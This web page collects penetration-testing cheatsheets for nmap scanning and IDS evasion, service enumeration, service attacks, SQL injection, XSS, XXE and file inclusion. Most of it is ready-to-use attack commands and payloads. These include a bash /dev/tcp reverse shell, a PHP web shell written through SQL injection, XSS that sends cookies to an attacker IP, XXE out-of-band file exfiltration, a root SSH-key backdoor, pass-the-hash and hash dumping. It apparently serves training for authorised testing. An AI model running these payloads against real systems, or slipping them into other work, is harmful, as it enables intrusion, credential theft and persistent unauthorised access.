Skip to content

cheetsheet

NMAP Cheatsheet

Nmap's TCP ACK scan (-sA) method is much harder to filter for firewalls and IDS/IPS systems than regular SYN (-sS) or Connect scans (sT) because they only send a TCP packet with only the ACK flag. When a port is closed or open, the host must respond with an RST flag. Unlike outgoing connections, all connection attempts (with the SYN flag) from external networks are usually blocked by firewalls. However, the packets with the ACK flag are often passed by the firewall because the firewall cannot determine whether the connection was first established from the external network or the internal network.

Decoys There are cases in which administrators block specific subnets from different regions in principle. This prevents any access to the target network. Another example is when IPS should block us. For this reason, the Decoy scanning method (-D) is the right choice. With this method, Nmap generates various random IP addresses inserted into the IP header to disguise the origin of the packet sent. With this method, we can generate random (RND) a specific number (for example: 5) of IP addresses separated by a colon (:). Our real IP address is then randomly placed between the generated IP addresses. In the next example, our real IP address is therefore placed in the second position. Another critical point is that the decoys must be alive. Otherwise, the service on the target may be unreachable due to SYN-flooding security mechanisms.

Scan by Using Decoys Firewall and IDS/IPS Evasion forhau@htb[/htb]$ sudo nmap 10.129.2.28 -p 80 -sS -Pn -n --disable-arp-ping --packet-trace -D RND:5

Scan by Using Different Source IP Firewall and IDS/IPS Evasion forhau@htb[/htb]$ sudo nmap 10.129.2.28 -n -Pn -p 445 -O -S 10.129.2.200 -e tun0

DNS Proxying By default, Nmap performs a reverse DNS resolution unless otherwise specified to find more important information about our target. These DNS queries are also passed in most cases because the given web server is supposed to be found and visited. The DNS queries are made over the UDP port 53. The TCP port 53 was previously only used for the so-called "Zone transfers" between the DNS servers or data transfer larger than 512 bytes. More and more, this is changing due to IPv6 and DNSSEC expansions. These changes cause many DNS requests to be made via TCP port 53.

However, Nmap still gives us a way to specify DNS servers ourselves (--dns-server ,). This method could be fundamental to us if we are in a demilitarized zone (DMZ). The company's DNS servers are usually more trusted than those from the Internet. So, for example, we could use them to interact with the hosts of the internal network. As another example, we can use TCP port 53 as a source port (--source-port) for our scans. If the administrator uses the firewall to control this port and does not filter IDS/IPS properly, our TCP packets will be trusted and passed through.

SYN-Scan of a Filtered Port Firewall and IDS/IPS Evasion forhau@htb[/htb]$ sudo nmap 10.129.2.28 -p50000 -sS -Pn -n --disable-arp-ping --packet-trace --source-port 53

Scanning Options

Nmap Option Description
10.10.10.0/24 Target network range.
-sn Disables port scanning.
-Pn Disables ICMP Echo Requests
-n Disables DNS Resolution.
-PE Performs the ping scan by using ICMP Echo Requests against the target.
--packet-trace Shows all packets sent and received.
--reason Displays the reason for a specific result.
--disable-arp-ping Disables ARP Ping Requests.
--top-ports= Scans the specified top ports that have been defined as most frequent.
-p- Scan all ports.
-p22-110 Scan all ports between 22 and 110.
-p22,25 Scans only the specified ports 22 and 25.
-F Scans top 100 ports.
-sS Performs an TCP SYN-Scan.
-sA Performs an TCP ACK-Scan.
-sU Performs an UDP Scan.
-sV Scans the discovered services for their versions.
-sC Perform a Script Scan with scripts that are categorized as "default".
--script SCRIPT Performs a Script Scan by using the specified scripts.
-O Performs an OS Detection Scan to determine the OS of the target.
-A Performs OS Detection, Service Detection, and traceroute scans.
-D RND:5 Sets the number of random Decoys that will be used to scan the target.
-e Specifies the network interface that is used for the scan.
-S 10.10.10.200 Specifies the source IP address for the scan.
-g Specifies the source port for the scan.
--dns-server DNS resolution is performed by using a specified name server.

Output Options

Nmap Option Description
-oA filename Stores the results in all available formats starting with the name of "filename".
-oN filename Stores the results in normal format with the name "filename".
-oG filename Stores the results in "grepable" format with the name of "filename".
-oX filename Stores the results in XML format with the name of "filename".

Performance Options

Nmap Option Description
--max-retries Sets the number of retries for scans of specific ports.
--stats-every=5s Displays scan's status every 5 seconds.
-v/-vv Displays verbose output during the scan.
--initial-rtt-timeout 50ms Sets the specified time value as initial RTT timeout.
--max-rtt-timeout 100ms Sets the specified time value as maximum RTT timeout.
--min-rate 300 Sets the number of packets that will be sent simultaneously.
-T <0-5> Specifies the specific timing template.

Pentesting Cheatsheet

When engaging in cybersecurity activities, such as penetration testing or vulnerability assessment, having a comprehensive toolkit of commands and scripts is essential. The following list provides a collection of commonly used commands across various stages of a cybersecurity engagement, including service scanning, web enumeration, exploiting public vulnerabilities, managing shells, escalating privileges, and transferring files. These commands are crucial for identifying potential vulnerabilities, exploiting them, and maintaining access to systems. They cover tools like nmap for network scanning, gobuster for web directory enumeration, Metasploit for exploiting known vulnerabilities, and netcat for establishing reverse shells. Additionally, they include methods for privilege escalation and file transfer, which are vital for post-exploitation activities. By mastering these commands, cybersecurity professionals can efficiently navigate and analyze systems to identify and address security weaknesses.

Basic Tools

Command Description
sudo openvpn user.ovpn Connect to VPN
ifconfig/ip a Show our IP address
netstat -rn Show networks accessible via the VPN
ssh user@10.10.10.10 SSH to a remote server
ftp 10.129.42.253 FTP to a remote server
tmux
tmux Start tmux
ctrl+b tmux: default prefix
prefix c tmux: new window
prefix 1 tmux: switch to window (1)
prefix shift+% tmux: split pane vertically
prefix shift+" tmux: split pane horizontally
prefix -> tmux: switch to the right pane
Vim
vim file vim: open file with vim
esc+i vim: enter insert mode
esc vim: back to normal mode
x vim: Cut character
dw vim: Cut word
dd vim: Cut full line
yw vim: Copy word
yy vim: Copy full line
p vim: Paste
:1 vim: Go to line number 1.
:w vim: Write the file 'i.e. save'
:q vim: Quit
:q! vim: Quit without saving
:wq vim: Write and quit

Pentesting

Command Description
Service Scanning
nmap 10.129.42.253 Run nmap on an IP
nmap -sV -sC -p- 10.129.42.253 Run an nmap script scan on an IP
locate scripts/citrix List various available nmap scripts
nmap --script smb-os-discovery.nse -p445 10.10.10.40 Run an nmap script on an IP
netcat 10.10.10.10 22 Grab banner of an open port
smbclient -N -L \\10.129.42.253 List SMB Shares
smbclient \\10.129.42.253\users Connect to an SMB share
snmpwalk -v 2c -c public 10.129.42.253 1.3.6.1.2.1.1.5.0 Scan SNMP on an IP
onesixtyone -c dict.txt 10.129.42.254 Brute force SNMP secret string
Web Enumeration
gobuster dir -u http://10.10.10.121/ -w /usr/share/dirb/wordlists/common.txt Run a directory scan on a website
gobuster dns -d inlanefreight.com -w /usr/share/SecLists/Discovery/DNS/namelist.txt Run a sub-domain scan on a website
curl -IL https://www.inlanefreight.com Grab website banner
whatweb 10.10.10.121 List details about the webserver/certificates
curl 10.10.10.121/robots.txt List potential directories in robots.txt
ctrl+U View page source (in Firefox)
Public Exploits
searchsploit openssh 7.2 Search for public exploits for a web application
msfconsole MSF: Start the Metasploit Framework
search exploit eternalblue MSF: Search for public exploits in MSF
use exploit/windows/smb/ms17_010_psexec MSF: Start using an MSF module
show options MSF: Show required options for an MSF module
set RHOSTS 10.10.10.40 MSF: Set a value for an MSF module option
check MSF: Test if the target server is vulnerable
exploit MSF: Run the exploit on the target server is vulnerable
Using Shells
nc -lvnp 1234 Start a nc listener on a local port
bash -c 'bash -i >& /dev/tcp/10.10.10.10/1234 0>&1' Send a reverse shell from the remote server
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f /bin/sh -i 2>&1
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f /bin/bash -i 2>&1
nc 10.10.10.1 1234 Connect to a bind shell started on the remote server
python -c 'import pty; pty.spawn("/bin/bash")' Upgrade shell TTY (1)
ctrl+z then stty raw -echo then fg then enter twice Upgrade shell TTY (2)
echo "" > /var/www/html/shell.php Create a webshell php file
curl http://SERVER_IP:PORT/shell.php?cmd=id Execute a command on an uploaded webshell
Privilege Escalation
./linpeas.sh Run linpeas script to enumerate remote server
sudo -l List available sudo privileges
sudo -u user /bin/echo Hello World! Run a command with sudo
sudo su - Switch to root user (if we have access to sudo su)
sudo su user - Switch to a user (if we have access to sudo su)
ssh-keygen -f key Create a new SSH key
echo "ssh-rsa AAAAB...SNIP...M= user@parrot" >> /root/.ssh/authorized_keys Add the generated public key to the user
ssh root@10.10.10.10 -i key SSH to the server with the generated private key
Transferring Files
python3 -m http.server 8000 Start a local webserver
wget http://10.10.14.1:8000/linpeas.sh Download a file on the remote server from our local machine
curl http://10.10.14.1:8000/linenum.sh -o linenum.sh Download a file on the remote server from our local machine
scp linenum.sh user@remotehost:/tmp/linenum.sh Transfer a file to the remote server with scp (requires SSH access)
base64 shell -w 0 Convert a file to base64
echo f0VMR...SNIO...InmDwU base64 -d > shell
md5sum shell Check the file's md5sum to ensure it converted correctly

Foothold Cheatsheet

Initial Foothold

In technical workflows, efficiency often hinges on recalling precise commands, flags, or syntax. These cheatsheets condense essential tools, techniques, and workflows into actionable quick-reference guides, designed to save time and reduce friction. Whether you’re scanning networks, automating tasks, or troubleshooting systems, use this curated collection as your "initial foothold" for rapid execution—eliminating guesswork and keeping critical information at your fingertips. Bookmark, print, or memorize these shortcuts to streamline your process and stay focused on results.

Infrastructure-based Enumeration

Command Description
curl -s https://crt.sh/\?q\=\&output\=json jq .
for i in $(cat ip-addresses.txt);do shodan host $i;done Scan each IP address in a list using Shodan.

Host-based Enumeration

FTP

Command Description
ftp Interact with the FTP service on the target.
nc -nv 21 Interact with the FTP service on the target.
telnet 21 Interact with the FTP service on the target.
openssl s_client -connect :21 -starttls ftp Interact with the FTP service on the target using encrypted connection.
wget -m --no-passive ftp://anonymous:anonymous@ Download all available files on the target FTP server.

SMB

Command Description
smbclient -N -L // Null session authentication on SMB.
smbclient /// Connect to a specific SMB share.
rpcclient -U "" Interaction with the target using RPC.
samrdump.py Username enumeration using Impacket scripts.
smbmap -H Enumerating SMB shares.
crackmapexec smb --shares -u '' -p '' Enumerating SMB shares using null session authentication.
enum4linux-ng.py -A SMB enumeration using enum4linux.

NFS

Command Description
showmount -e Show available NFS shares.
mount -t nfs :/ ./target-NFS/ -o nolock Mount the specific NFS share.umount ./target-NFS
umount ./target-NFS Unmount the specific NFS share.

DNS

Command Description
dig ns @ NS request to the specific nameserver.
dig any @ ANY request to the specific nameserver.
dig axfr @ AXFR request to the specific nameserver.
dnsenum --dnsserver --enum -p 0 -s 0 -o found_subdomains.txt -f ~/subdomains.list Subdomain brute forcing.

SMTP

Command Description
telnet 25

IMAP/POP3

Command Description
curl -k 'imaps://' --user : Log in to the IMAPS service using cURL.
openssl s_client -connect :imaps Connect to the IMAPS service.
openssl s_client -connect :pop3s Connect to the POP3s service.

SNMP

Command Description
snmpwalk -v2c -c Querying OIDs using snmpwalk.
onesixtyone -c community-strings.list Bruteforcing community strings of the SNMP service.
braa @:.1.* Bruteforcing SNMP service OIDs.

MySQL

Command Description
mysql -u -p -h Login to the MySQL server.

MSSQL

Command Description
mssqlclient.py @ -windows-auth Log in to the MSSQL server using Windows authentication.

IPMI

Command Description
msf6 auxiliary(scanner/ipmi/ipmi_version) IPMI version detection.
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) Dump IPMI hashes.

Linux Remote Management

Command Description
ssh-audit.py Remote security audit against the target SSH service.
ssh @ Log in to the SSH server using the SSH client.
ssh -i private.key @ Log in to the SSH server using private key.
ssh @ -o PreferredAuthentications=password Enforce password-based authentication.

Windows Remote Management

Command Description
rdp-sec-check.pl Check the security settings of the RDP service.
xfreerdp /u: /p:"" /v: Log in to the RDP server from Linux.
evil-winrm -i -u -p Log in to the WinRM server.
wmiexec.py :""@ "" Execute command using the WMI service.

Oracle TNS

Command Description
./odat.py all -s Perform a variety of scans to gather information about the Oracle database services and its components.
sqlplus /@/ Log in to the Oracle database.
./odat.py utlfile -s -d -U -P --sysdba --putFile C:\insert\path file.txt ./file.txt Upload a file with Oracle RDBMS.

Attacking FTP

Command Description
ftp 192.168.2.142 Connecting to the FTP server using the ftp client.
nc -v 192.168.2.142 21 Connecting to the FTP server using netcat.
hydra -l user1 -P /usr/share/wordlists/rockyou.txt ftp://192.168.2.142 Brute-forcing the FTP service.

Attacking SMB

Command Description
smbclient -N -L //10.129.14.128 Null-session testing against the SMB service.
smbmap -H 10.129.14.128 Network share enumeration using smbmap.
smbmap -H 10.129.14.128 -r notes Recursive network share enumeration using smbmap.
smbmap -H 10.129.14.128 --download "notes\note.txt" Download a specific file from the shared folder.
smbmap -H 10.129.14.128 --upload test.txt "notes\test.txt" Upload a specific file to the shared folder.
rpcclient -U'%' 10.10.110.17 Null-session with the rpcclient.
./enum4linux-ng.py 10.10.11.45 -A -C Automated enumeratition of the SMB service using enum4linux-ng.
crackmapexec smb 10.10.110.17 -u /tmp/userlist.txt -p 'Company01!' Password spraying against different users from a list.
impacket-psexec administrator:'Password123!'@10.10.110.17 Connect to the SMB service using the impacket-psexec.
crackmapexec smb 10.10.110.17 -u Administrator -p 'Password123!' -x 'whoami' --exec-method smbexec Execute a command over the SMB service using crackmapexec.
crackmapexec smb 10.10.110.0/24 -u administrator -p 'Password123!' --loggedon-users Enumerating Logged-on users.
crackmapexec smb 10.10.110.17 -u administrator -p 'Password123!' --sam Extract hashes from the SAM database.
crackmapexec smb 10.10.110.17 -u Administrator -H 2B576ACBE6BCFDA7294D6BD18041B8FE Use the Pass-The-Hash technique to authenticate on the target host.
impacket-ntlmrelayx --no-http-server -smb2support -t 10.10.110.146 Dump the SAM database using impacket-ntlmrelayx.
impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.220.146 -c 'powershell -e Execute a PowerShell based reverse shell using impacket-ntlmrelayx.

Attacking SQL Databases

Command Description
mysql -u julio -pPassword123 -h 10.129.20.13 Connecting to the MySQL server.
sqlcmd -S SRVMSSQL\SQLEXPRESS -U julio -P 'MyPassword!' -y 30 -Y 30 Connecting to the MSSQL server.
sqsh -S 10.129.203.7 -U julio -P 'MyPassword!' -h Connecting to the MSSQL server from Linux.
sqsh -S 10.129.203.7 -U .\julio -P 'MyPassword!' -h Connecting to the MSSQL server from Linux while Windows Authentication mechanism is used by the MSSQL server.
mysql> SHOW DATABASES; Show all available databases in MySQL.
mysql> USE htbusers; Select a specific database in MySQL.
mysql> SHOW TABLES; Show all available tables in the selected database in MySQL.
mysql> SELECT * FROM users; Select all available entries from the "users" table in MySQL.
sqlcmd> SELECT name FROM master.dbo.sysdatabases Show all available databases in MSSQL.
sqlcmd> USE htbusers Select a specific database in MSSQL.
sqlcmd> SELECT * FROM htbusers.INFORMATION_SCHEMA.TABLES Show all available tables in the selected database in MSSQL.
sqlcmd> SELECT * FROM users Select all available entries from the "users" table in MSSQL.
sqlcmd> EXECUTE sp_configure 'show advanced options', 1 To allow advanced options to be changed.
sqlcmd> EXECUTE sp_configure 'xp_cmdshell', 1 To enable the xp_cmdshell.
sqlcmd> RECONFIGURE To be used after each sp_configure command to apply the changes.
sqlcmd> xp_cmdshell 'whoami' Execute a system command from MSSQL server.
mysql> SELECT "" INTO OUTFILE '/var/www/html/webshell.php' Create a file using MySQL.
mysql> show variables like "secure_file_priv"; Check if the the secure file privileges are empty to read locally stored files on the system.
sqlcmd> SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents Read local files in MSSQL.
mysql> select LOAD_FILE("/etc/passwd"); Read local files in MySQL.
sqlcmd> EXEC master..xp_dirtree '\10.10.110.17\share\' Hash stealing using the xp_dirtree command in MSSQL.
sqlcmd> EXEC master..xp_subdirs '\10.10.110.17\share\' Hash stealing using the xp_subdirs command in MSSQL.
sqlcmd> SELECT srvname, isremote FROM sysservers Identify linked servers in MSSQL.
sqlcmd> EXECUTE('select @@servername, @@version, system_user, is_srvrolemember(''sysadmin'')') AT [10.0.0.12\SQLEXPRESS] Identify the user and its privileges used for the remote connection in MSSQL.

Attacking RDP

Command Description
crowbar -b rdp -s 192.168.220.142/32 -U users.txt -c 'password123' Password spraying against the RDP service.
hydra -L usernames.txt -p 'password123' 192.168.2.143 rdp Brute-forcing the RDP service.
rdesktop -u admin -p password123 192.168.2.143 Connect to the RDP service using rdesktop in Linux.
tscon #{TARGET_SESSION_ID} /dest:#{OUR_SESSION_NAME} Impersonate a user without its password.
net start sessionhijack Execute the RDP session hijack.
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f Enable "Restricted Admin Mode" on the target Windows host.
xfreerdp /v:192.168.2.141 /u:admin /pth:A9FDFA038C4B75EBC76DC855DD74F0DA Use the Pass-The-Hash technique to login on the target host without a password.

Attacking DNS

Command Description
dig AXFR @ns1.inlanefreight.htb inlanefreight.htb Perform an AXFR zone transfer attempt against a specific name server.
subfinder -d inlanefreight.com -v Brute-forcing subdomains.
host support.inlanefreight.com DNS lookup for the specified subdomain.

Attacking Email Services

Command Description
host -t MX microsoft.com DNS lookup for mail servers for the specified domain.
dig mx inlanefreight.com grep "MX"
host -t A mail1.inlanefreight.htb. DNS lookup of the IPv4 address for the specified subdomain.
telnet 10.10.110.20 25 Connect to the SMTP server.
smtp-user-enum -M RCPT -U userlist.txt -D inlanefreight.htb -t 10.129.203.7 SMTP user enumeration using the RCPT command against the specified host.
python3 o365spray.py --validate --domain msplaintext.xyz Verify the usage of Office365 for the specified domain.
python3 o365spray.py --enum -U users.txt --domain msplaintext.xyz Enumerate existing users using Office365 on the specified domain.
python3 o365spray.py --spray -U usersfound.txt -p 'March2022!' --count 1 --lockout 1 --domain msplaintext.xyz Password spraying against a list of users that use Office365 for the specified domain.
hydra -L users.txt -p 'Company01!' -f 10.10.110.20 pop3 Brute-forcing the POP3 service.
swaks --from notifications@inlanefreight.com --to employees@inlanefreight.com --header 'Subject: Notification' --body 'Message' --server 10.10.11.213 Testing the SMTP service for the open-relay vulnerability.

Web Application Cheatsheet

Web application penetration testing is a critical security practice designed to identify and exploit vulnerabilities in web applications, simulating real-world attacks to assess their resilience against cyber threats. This method involves a thorough examination of the application's architecture, from the user interface to the underlying codebase, to uncover potential security gaps that could be exploited by malicious actors. By mimicking the tactics, techniques, and procedures (TTPs) used by hackers, penetration testers provide actionable insights into an application's security posture, helping organizations strengthen their defenses and comply with industry standards like PCI-DSS. This proactive approach not only enhances security but also reduces the risk of data breaches and financial losses, ensuring that sensitive data remains protected.

Checklist: - Client-side validation — Checks may not be replicated on the server - Database interaction — SQL injection - File uploading and downloading — Path traversal vulnerabilities, stored cross-site scripting - Display of user-supplied data — Cross-site scripting - Dynamic redirects — Redirection and header injection attacks - Social networking features — username enumeration, stored cross-site scripting - Login — Username enumeration, weak passwords, ability to use brute force - Multistage login — Logic flaws - Session state — Predictable tokens, insecure handling of tokens - Access controls — Horizontal and vertical privilege escalation - User impersonation functions — Privilege escalation - Use of cleartext communications — Session hijacking, capture of credentials and other sensitive data - Off-site links — Leakage of query string parameters in the Referer header - Interfaces to external systems — Shortcuts in the handling of sessions and/or access controls - Error messages — Information leakage - E-mail interaction — E-mail and/or command injection - Native code components or interaction — Buffer overflows - Use of third-party application components — Known vulnerabilities - Identifiable web server software — Common configuration weaknesses, known software bugs

For cloud pentesting check \<a href="https://github.com/RhinoSecurityLabs/pacu/wiki/Module-Details" target="_blank">Pacu\</a> tool.

Enumeration

with raw HTTP request from BURP repeater:

POST /login.php HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 27

username=admin&password=FUZZ

save it into req.txt and perform the login bruteforce:

ffuf -request req.txt -w /path/to/passwords.txt

To fuzz multiple parameters in the request, you can use multiple FUZZ keywords and specify the corresponding wordlists with the -w option. For example, if you want to fuzz both the username and password parameters, you can use the following command:

ffuf -request req.txt -w usernames.txt:UFUZZ -w passwords.txt:PFUZZ -fs 4242

This will use the usernames.txt wordlist for the UFUZZ keyword and the passwords.txt wordlist for the PFUZZ keyword.

How to filter:

-mc 200 match HTTP 200

-fs 4242 filter content size 4242

-fr “invalid” filter by responses matching regex “invalid”

-r Follow redirects, default to false

Spidering through BURP in 8080:

ffuf.exe -request .\req.txt -w .\directories.txt -x http://127.0.0.1:8080

Different modes (like in BURP Intruder)

ffuf.exe -request .\req.txt -request-proto http -w bytes.txt:BFUZZ -w passwords.txt:PFUZZ -mode pitchfork

Multi-wordlist operation mode. Available modes: clusterbomb, pitchfork, sniper (default: clusterbomb)

Ffuf

Command Description
ffuf -h ffuf help
ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/FUZZ Directory Fuzzing
ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/indexFUZZ Extension Fuzzing
ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/blog/FUZZ.php Page Fuzzing
ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/FUZZ -recursion -recursion-depth 1 -e .php -v Recursive Fuzzing
ffuf -w wordlist.txt:FUZZ -u https://FUZZ.hackthebox.eu/ Sub-domain Fuzzing
ffuf -w wordlist.txt:FUZZ -u http://academy.htb:PORT/ -H 'Host: FUZZ.academy.htb' -fs xxx VHost Fuzzing
ffuf -w wordlist.txt:FUZZ -u http://admin.academy.htb:PORT/admin/admin.php?FUZZ=key -fs xxx Parameter Fuzzing - GET
ffuf -w wordlist.txt:FUZZ -u http://admin.academy.htb:PORT/admin/admin.php -X POST -d 'FUZZ=key' -H 'Content-Type: application/x-www-form-urlencoded' -fs xxx Parameter Fuzzing - POST
ffuf -w ids.txt:FUZZ -u http://admin.academy.htb:PORT/admin/admin.php -X POST -d 'id=FUZZ' -H 'Content-Type: application/x-www-form-urlencoded' -fs xxx Value Fuzzing
ffuf -w ./folders.txt:FOLDERS,./wordlist.txt:WORDLIST,./extensions.txt:EXTENSIONS -u http://192.168.10.10/FOLDERS/WORDLISTEXTENSIONS Crawl with:
-found folders in previous scan (dirlisting alias)
-cewl wordlist (generatelist alias)
-raft-* list for extensions, or known extension

Wordlists

Command Description
/opt/useful/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt Directory/Page Wordlist
/opt/useful/SecLists/Discovery/Web-Content/web-extensions.txt Extensions Wordlist
/opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
/opt/useful/SecLists/Discovery/DNS/namelist.txt Domain Wordlist
/opt/useful/SecLists/Discovery/Web-Content/burp-parameter-names.txt Parameters Wordlist
/opt/share/seclists/Discovery/Web-Content/raft-* folders, words, extensions

Misc

Command Description
sudo sh -c 'echo "SERVER_IP academy.htb" >> /etc/hosts' Add DNS entry
for i in $(seq 1 1000); do echo $i >> ids.txt; done Create Sequence Wordlist
curl http://admin.academy.htb:PORT/admin/admin.php -X POST -d 'id=key' -H 'Content-Type: application/x-www-form-urlencoded' curl w/ POST

HTTP

HTTP Verb Tampering

HTTP Method - HEAD - PUT - DELETE - OPTIONS - PATCH

Command Description
-X OPTIONS Set HTTP Method with Curl

IDOR

Identify IDORS - In URL parameters & APIs - In AJAX Calls - By understanding reference hashing/encoding - By comparing user roles

Command Description
md5sum MD5 hash a string
base64 Base64 encode a string

XXE

Code Description
\<!ENTITY xxe SYSTEM "http://localhost/email.dtd"> Define External Entity to a URL
\<!ENTITY xxe SYSTEM "file:///etc/passwd"> Define External Entity to a file path
\<!ENTITY company SYSTEM "php://filter/convert.base64-encode/resource=index.php"> Read PHP source code with base64 encode filter
\<!ENTITY % error "\<!ENTITY content SYSTEM '%nonExistingEntity;/%file;'>"> Reading a file through a PHP error
\<!ENTITY % oob "\<!ENTITY content SYSTEM 'http://OUR_IP:8000/?content=%file;'>"> Reading a file OOB exfiltration
&xxe; Reference External Entity

SQLi

MySQL

Command Description
General
mysql -u root -h docker.hackthebox.eu -P 3306 -p login to mysql database
SHOW DATABASES List available databases
USE users Switch to database
Tables
CREATE TABLE logins (id INT, ...) Add a new table
SHOW TABLES List available tables in current database
DESCRIBE logins Show table properties and columns
INSERT INTO table_name VALUES (value_1,..) Add values to table
INSERT INTO table_name(column2, ...) VALUES (column2_value, ..) Add values to specific columns in a table
UPDATE table_name SET column1=newvalue1, ... WHERE \<condition> Update table values
Columns
SELECT * FROM table_name Show all columns in a table
SELECT column1, column2 FROM table_name Show specific columns in a table
DROP TABLE logins Delete a table
ALTER TABLE logins ADD newColumn INT Add new column
ALTER TABLE logins RENAME COLUMN newColumn TO oldColumn Rename column
ALTER TABLE logins MODIFY oldColumn DATE Change column datatype
ALTER TABLE logins DROP oldColumn Delete column
Output
SELECT * FROM logins ORDER BY column_1 Sort by column
SELECT * FROM logins ORDER BY column_1 DESC Sort by column in descending order
SELECT * FROM logins ORDER BY column_1 DESC, id ASC Sort by two-columns
SELECT * FROM logins LIMIT 2 Only show first two results
SELECT * FROM logins LIMIT 1, 2 Only show first two results starting from index 2
SELECT * FROM table_name WHERE \<condition> List results that meet a condition
SELECT * FROM logins WHERE username LIKE 'admin%' List results where the name is similar to a given string

MySQL Operator Precedence - Division (/), Multiplication (*), and Modulus (%) - Addition (+) and Subtraction (-) - Comparison (=, >, \<, \<=, >=, !=, LIKE) - NOT (!) - AND (&&) - OR (||)

SQL Injection

Payload Description
Auth Bypass
admin' or '1'='1 Basic Auth Bypass
admin')-- - Basic Auth Bypass With comments
Auth Bypass Payloads
Union Injection
' order by 1-- - Detect number of columns using order by
cn' UNION select 1,2,3-- - Detect number of columns using Union injection
cn' UNION select 1,@@version,3,4-- - Basic Union injection
UNION select username, 2, 3, 4 from passwords-- - Union injection for 4 columns
DB Enumeration
SELECT @@version Fingerprint MySQL with query output
SELECT SLEEP(5) Fingerprint MySQL with no output
cn' UNION select 1,database(),2,3-- - Current database name
cn' UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA-- - List all databases
cn' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES where table_schema='dev'-- - List all tables in a specific database
cn' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='credentials'-- - List all columns in a specific table
cn' UNION select 1, username, password, 4 from dev.credentials-- - Dump data from a table in another database
Privileges
cn' UNION SELECT 1, user(), 3, 4-- - Find current user
cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user WHERE user="root"-- - Find if user has admin privileges
cn' UNION SELECT 1, grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE grantee="'root'@'localhost'"-- - Find if all user privileges
cn' UNION SELECT 1, variable_name, variable_value, 4 FROM information_schema.global_variables where variable_name="secure_file_priv"-- - Find which directories can be accessed through MySQL
File Injection
cn' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4-- - Read local file
select 'file written successfully!' into outfile '/var/www/html/proof.txt' Write a string to a local file
cn' union select "",'\<?php system($_REQUEST[0]); ?>', "", "" into outfile '/var/www/html/shell.php'-- - Write a web shell into the base web directory

SQLMAP

Command Description
sqlmap -h View the basic help menu
sqlmap -hh View the advanced help menu
sqlmap -u "http://www.example.com/vuln.php?id=1" --batch Run SQLMap without asking for user input
sqlmap 'http://www.example.com/' --data 'uid=1&name=test' SQLMap with POST request
sqlmap 'http://www.example.com/' --data 'uid=1*&name=test' POST request specifying an injection point with an asterisk
sqlmap -r req.txt Passing an HTTP request file to SQLMap
sqlmap ... --cookie='PHPSESSID=ab4530f4a7d10448457fa8b0eadac29c' Specifying a cookie header
sqlmap -u www.target.com --data='id=1' --method PUT Specifying a PUT request
sqlmap -u "http://www.target.com/vuln.php?id=1" --batch -t /tmp/traffic.txt Store traffic to an output file
sqlmap -u "http://www.target.com/vuln.php?id=1" -v 6 --batch Specify verbosity level
sqlmap -u "www.example.com/?q=test" --prefix="%'))" --suffix="-- -" Specifying a prefix or suffix
sqlmap -u www.example.com/?id=1 -v 3 --level=5 Specifying the level and risk
sqlmap -u "http://www.example.com/?id=1" --banner --current-user --current-db --is-dba Basic DB enumeration
sqlmap -u "http://www.example.com/?id=1" --tables -D testdb Table enumeration
sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb -C name,surname Table/row enumeration
sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb --where="name LIKE 'f%'" Conditional enumeration
sqlmap -u "http://www.example.com/?id=1" --schema Database schema enumeration
sqlmap -u "http://www.example.com/?id=1" --search -T user Searching for data
sqlmap -u "http://www.example.com/?id=1" --passwords --batch Password enumeration and cracking
sqlmap -u "http://www.example.com/" --data="id=1&csrf-token=WfF1szMUHhiokx9AHFply5L2xAOfjRkE" --csrf-token="csrf-token" Anti-CSRF token bypass
sqlmap --list-tampers List all tamper scripts
sqlmap -u "http://www.example.com/case1.php?id=1" --is-dba Check for DBA privileges
sqlmap -u "http://www.example.com/?id=1" --file-read "/etc/passwd" Reading a local file
sqlmap -u "http://www.example.com/?id=1" --file-write "shell.php" --file-dest "/var/www/html/shell.php" Writing a file
sqlmap -u "http://www.example.com/?id=1" --os-shell Spawning an OS shell

XSS

Code Description
XSS Payloads
\<script>alert(window.origin)\</script> Basic XSS Payload
\<plaintext> Basic XSS Payload
\<script>print()\</script> Basic XSS Payload
\<img src="" onerror=alert(window.origin)> HTML-based XSS Payload
\<script>document.body.style.background = "#141d2b"\</script> Change Background Color
\<script>document.body.background = "https://www.hackthebox.eu/images/logo-htb.svg"\</script> Change Background Image
\<script>document.title = 'HackTheBox Academy'\</script> Change Website Title
\<script>document.getElementsByTagName('body')[0].innerHTML = 'text'\</script> Overwrite website's main body
\<script>document.getElementById('urlform').remove();\</script> Remove certain HTML element
\<script src="http://OUR_IP/script.js">\</script> Load remote script
\<script>new Image().src='http://OUR_IP/index.php?c='+document.cookie\</script> Send Cookie details to us
Commands
python xsstrike.py -u "http://SERVER_IP:PORT/index.php?task=test" Run xsstrike on a url parameter
sudo nc -lvnp 80 Start netcat listener
sudo php -S 0.0.0.0:80 Start PHP server

Path traversal

Local File Inclusion

Command Description
Basic LFI
/index.php?language=/etc/passwd Basic LFI
/index.php?language=../../../../etc/passwd LFI with path traversal
